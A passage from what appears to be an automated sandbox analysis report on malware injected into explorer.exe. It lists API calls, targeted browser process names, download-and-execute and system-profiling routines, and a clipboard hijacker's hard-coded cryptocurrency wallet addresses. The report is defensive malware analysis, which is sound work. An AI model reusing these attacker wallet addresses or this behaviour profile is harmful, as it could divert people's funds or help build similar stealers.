dfe0808 514->527 515->503 519 dfa736e-dfa7370 516->519 520 dfa726d-dfa7275 516->520 517->457 521 dfa73dd-dfa73e2 517->521 523 dfa7373-dfa737a 519->523 520->519 524 dfa727b-dfa7283 520->524 521->517 525 dfa73e4-dfa73ea 521->525 523->511 529 dfa7380 523->529 524->519 530 dfa7289-dfa7290 524->530 525->465 526->457 536 dfa718c 526->536 527->515 538 dfa71a2-dfa71c0 call dfe0808 527->538 529->461 534 dfa746f-dfa7474 call dfbe6f8 530->534 535 dfa7296-dfa72c8 call dfe0828 530->535 534->490 535->461 544 dfa72ce-dfa72d0 535->544 536->515 538->515 544->461 545 dfa72d6 544->545 546 dfa72dc-dfa72e8 545->546 547 dfa7385-dfa7397 545->547 548 dfa72ea-dfa72fe realloc 546->548 549 dfa7302-dfa7308 546->549 547->465 548->549 550 dfa7310-dfa732e recv 549->550 550->461 551 dfa7334-dfa7338 550->551 551->550 552 dfa733a-dfa7353 recv 551->552 552->461 553 dfa7359-dfa736c 552->553 553->523
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0DFAA6C2
                                                                                                                                                                                                                        • InternetCrackUrlA.WININET ref: 0DFAA6D7
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcpyA.KERNEL32 ref: 0DFA6E6E
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6E7F
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6E93
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6EA7
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6EB8
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6ECC
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6EEA
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: wsprintfA.USER32 ref: 0DFA6F02
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6F16
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6F2A
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6F66
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: WSAStartup.WS2_32 ref: 0DFA6F76
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: socket.WS2_32 ref: 0DFA6F92
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: gethostbyname.WS2_32 ref: 0DFA6FA9
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: memcpy.MSVCRT ref: 0DFA6FC9
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: htons.WS2_32 ref: 0DFA6FD8
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: connect.WS2_32 ref: 0DFA6FEF
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrlenA.KERNEL32 ref: 0DFA7005
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: send.WS2_32 ref: 0DFA701B
                                                                                                                                                                                                                        • PathFindFileNameA.SHLWAPI ref: 0DFAA751
                                                                                                                                                                                                                        • GetTempPathA.KERNEL32 ref: 0DFAA76F
                                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32 ref: 0DFAA785
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFAA795
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFAA7A1
                                                                                                                                                                                                                        • CreateFileA.KERNEL32 ref: 0DFAA7CA
                                                                                                                                                                                                                        • WriteFile.KERNEL32 ref: 0DFAA7EF
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DFAA7FE
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DFAA807
                                                                                                                                                                                                                        • ShellExecuteA.SHELL32 ref: 0DFAA835
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DFAA844
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DFAA84F
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32 ref: 0DFAAA49
                                                                                                                                                                                                                        • GetComputerNameW.KERNEL32 ref: 0DFAAA63
                                                                                                                                                                                                                          • Part of subcall function 0DFAA350: WideCharToMultiByte.KERNEL32 ref: 0DFAA393
                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32 ref: 0DFAAA8C
                                                                                                                                                                                                                        • GetVersionExA.KERNEL32 ref: 0DFAAA9D
                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 0DFAAAED
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: EnterCriticalSection.KERNEL32 ref: 0DFA8FE8
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: RtlInitializeCriticalSection.NTDLL ref: 0DFA8FF5
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrcpyA.KERNEL32 ref: 0DFA902A
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrcpyA.KERNEL32 ref: 0DFA904D
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrcatA.KERNEL32 ref: 0DFA905D
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrcatA.KERNEL32 ref: 0DFA906D
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: LeaveCriticalSection.KERNEL32 ref: 0DFA90F4
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: memcpy.MSVCRT ref: 0DFA910C
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrlenA.KERNEL32 ref: 0DFA911A
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DFAAB01
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                        • String ID: 2.6
                                                                                                                                                                                                                        • API String ID: 2800961625-471037017
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3234909527-0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                        • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 936357808-3480109235

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                        • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 936357808-3480109235

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                        • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 936357808-3480109235

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3250796435-0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFA9C50: GetWindowsDirectoryW.KERNEL32 ref: 0DFA9CA3
                                                                                                                                                                                                                          • Part of subcall function 0DFA9C50: GetVolumeInformationW.KERNEL32 ref: 0DFA9CF2
                                                                                                                                                                                                                          • Part of subcall function 0DFA9C50: wsprintfW.USER32 ref: 0DFA9D54
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32 ref: 0DFA9DE5
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DFA9DF5
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DFA9E03
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32 ref: 0DFA9E0E
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 0DFA9E1C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DFA9E2C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DFA9E3A
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DFA9E4A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: c2465feb47dfbf4e39e3fb636e60b490fb9b3a01f4a1802c0286285fc0bd52c3
                                                                                                                                                                                                                        • Instruction ID: 8b1d7861878b2eba111361a400df37aa111bf1c5faa515e8e865dcffa86103dd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2465feb47dfbf4e39e3fb636e60b490fb9b3a01f4a1802c0286285fc0bd52c3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4521F332319B42A6EB90DB65F81876D33A2FB89744F459036DA8F87714EE38C519CB24

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFA9B30: GetWindowsDirectoryA.KERNEL32 ref: 0DFA9B7C
                                                                                                                                                                                                                          • Part of subcall function 0DFA9B30: GetVolumeInformationA.KERNEL32 ref: 0DFA9BC6
                                                                                                                                                                                                                          • Part of subcall function 0DFA9B30: wsprintfA.USER32 ref: 0DFA9C27
                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32 ref: 0DFA9EC3
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFA9ED3
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFA9EE1
                                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32 ref: 0DFA9EEC
                                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32 ref: 0DFA9EFA
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFA9F0A
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFA9F18
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFA9F28
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 60a5b1947e9a1e6045203543321f9579d85a40846c9d1738233bd2d77a5d265c
                                                                                                                                                                                                                        • Instruction ID: b471df98b209a6e899d18728240feb90184db3af7f9698d6b22fbd31ed70697b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60a5b1947e9a1e6045203543321f9579d85a40846c9d1738233bd2d77a5d265c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13113A21215B4692EB40DF65FC5476EB3A3FB89B84F44A036EA8B07728DE3CC104CB14

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFB84B0: OpenClipboard.USER32 ref: 0DFB84C1
                                                                                                                                                                                                                          • Part of subcall function 0DFB84B0: GetClipboardData.USER32 ref: 0DFB84D3
                                                                                                                                                                                                                          • Part of subcall function 0DFB84B0: GlobalLock.KERNEL32 ref: 0DFB84E4
                                                                                                                                                                                                                          • Part of subcall function 0DFB84B0: GlobalUnlock.KERNEL32 ref: 0DFB84F5
                                                                                                                                                                                                                          • Part of subcall function 0DFB84B0: CloseClipboard.USER32 ref: 0DFB84FB
                                                                                                                                                                                                                          • Part of subcall function 0DFB86A0: GlobalAlloc.KERNEL32 ref: 0DFB86C8
                                                                                                                                                                                                                          • Part of subcall function 0DFB86A0: GlobalLock.KERNEL32 ref: 0DFB86DF
                                                                                                                                                                                                                          • Part of subcall function 0DFB86A0: GlobalUnlock.KERNEL32 ref: 0DFB86F7
                                                                                                                                                                                                                          • Part of subcall function 0DFB86A0: OpenClipboard.USER32 ref: 0DFB86FF
                                                                                                                                                                                                                          • Part of subcall function 0DFB86A0: EmptyClipboard.USER32 ref: 0DFB8705
                                                                                                                                                                                                                          • Part of subcall function 0DFB86A0: SetClipboardData.USER32 ref: 0DFB8713
                                                                                                                                                                                                                          • Part of subcall function 0DFB86A0: CloseClipboard.USER32 ref: 0DFB8719
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0DFB8460
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                        • API String ID: 2992153386-3773165574
                                                                                                                                                                                                                        • Opcode ID: 3a1ac99372e29ab795ba79f5b1fdf45b8ebdb8f0876bd9542872a168e3d096c2
                                                                                                                                                                                                                        • Instruction ID: 371d0ced97e3b59219bb3e5735cd061428e15f743dbb177a3ca7a60a26f7fe22
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a1ac99372e29ab795ba79f5b1fdf45b8ebdb8f0876bd9542872a168e3d096c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2D12E61715646A9DF00EFA9D8542EC3326EB957DCFC2D4228F0E5BA58EF64CA09C350

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E1184B0: OpenClipboard.USER32 ref: 0E1184C1
                                                                                                                                                                                                                          • Part of subcall function 0E1184B0: GetClipboardData.USER32 ref: 0E1184D3
                                                                                                                                                                                                                          • Part of subcall function 0E1184B0: GlobalLock.KERNEL32 ref: 0E1184E4
                                                                                                                                                                                                                          • Part of subcall function 0E1184B0: GlobalUnlock.KERNEL32 ref: 0E1184F5
                                                                                                                                                                                                                          • Part of subcall function 0E1184B0: CloseClipboard.USER32 ref: 0E1184FB
                                                                                                                                                                                                                          • Part of subcall function 0E1186A0: GlobalAlloc.KERNEL32 ref: 0E1186C8
                                                                                                                                                                                                                          • Part of subcall function 0E1186A0: GlobalLock.KERNEL32 ref: 0E1186DF
                                                                                                                                                                                                                          • Part of subcall function 0E1186A0: GlobalUnlock.KERNEL32 ref: 0E1186F7
                                                                                                                                                                                                                          • Part of subcall function 0E1186A0: OpenClipboard.USER32 ref: 0E1186FF
                                                                                                                                                                                                                          • Part of subcall function 0E1186A0: EmptyClipboard.USER32 ref: 0E118705
                                                                                                                                                                                                                          • Part of subcall function 0E1186A0: SetClipboardData.USER32 ref: 0E118713
                                                                                                                                                                                                                          • Part of subcall function 0E1186A0: CloseClipboard.USER32 ref: 0E118719
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0E118460
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 0E118366
                                                                                                                                                                                                                        • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 0E1181B0
                                                                                                                                                                                                                        • 13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV, xrefs: 0E117F68
                                                                                                                                                                                                                        • LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx, xrefs: 0E11811E
                                                                                                                                                                                                                        • 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe, xrefs: 0E117FFA
                                                                                                                                                                                                                        • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 0E118242
                                                                                                                                                                                                                        • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 0E1183F8
                                                                                                                                                                                                                        • TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb, xrefs: 0E11808C
                                                                                                                                                                                                                        • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 0E1182D4
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                        • String ID: 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe$13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx$TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                                                                        • API String ID: 2992153386-3773165574
                                                                                                                                                                                                                        • Opcode ID: 3a1ac99372e29ab795ba79f5b1fdf45b8ebdb8f0876bd9542872a168e3d096c2
                                                                                                                                                                                                                        • Instruction ID: ad3aa48833f987bdc4b42a26cc7a0c777b361f02ab46d8d042e9e88a98747363
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a1ac99372e29ab795ba79f5b1fdf45b8ebdb8f0876bd9542872a168e3d096c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0BD11D71711A46A5DF00EFA1E4543EC63A6E7557CCFC08822AE0D6BB99EF74CA89C350

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF584B0: OpenClipboard.USER32 ref: 0FF584C1
                                                                                                                                                                                                                          • Part of subcall function 0FF584B0: GetClipboardData.USER32 ref: 0FF584D3
                                                                                                                                                                                                                          • Part of subcall function 0FF584B0: GlobalLock.KERNEL32 ref: 0FF584E4
                                                                                                                                                                                                                          • Part of subcall function 0FF584B0: GlobalUnlock.KERNEL32 ref: 0FF584F5
                                                                                                                                                                                                                          • Part of subcall function 0FF584B0: CloseClipboard.USER32 ref: 0FF584FB
                                                                                                                                                                                                                          • Part of subcall function 0FF586A0: GlobalAlloc.KERNEL32 ref: 0FF586C8
                                                                                                                                                                                                                          • Part of subcall function 0FF586A0: GlobalLock.KERNEL32 ref: 0FF586DF
                                                                                                                                                                                                                          • Part of subcall function 0FF586A0: GlobalUnlock.KERNEL32 ref: 0FF586F7
                                                                                                                                                                                                                          • Part of subcall function 0FF586A0: OpenClipboard.USER32 ref: 0FF586FF
                                                                                                                                                                                                                          • Part of subcall function 0FF586A0: EmptyClipboard.USER32 ref: 0FF58705
                                                                                                                                                                                                                          • Part of subcall function 0FF586A0: SetClipboardData.USER32 ref: 0FF58713
                                                                                                                                                                                                                          • Part of subcall function 0FF586A0: CloseClipboard.USER32 ref: 0FF58719
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0FF58460
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb, xrefs: 0FF5808C
                                                                                                                                                                                                                        • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 0FF58242
                                                                                                                                                                                                                        • 13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV, xrefs: 0FF57F68
                                                                                                                                                                                                                        • 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe, xrefs: 0FF57FFA
                                                                                                                                                                                                                        • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 0FF582D4
                                                                                                                                                                                                                        • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 0FF583F8
                                                                                                                                                                                                                        • LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx, xrefs: 0FF5811E
                                                                                                                                                                                                                        • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 0FF581B0
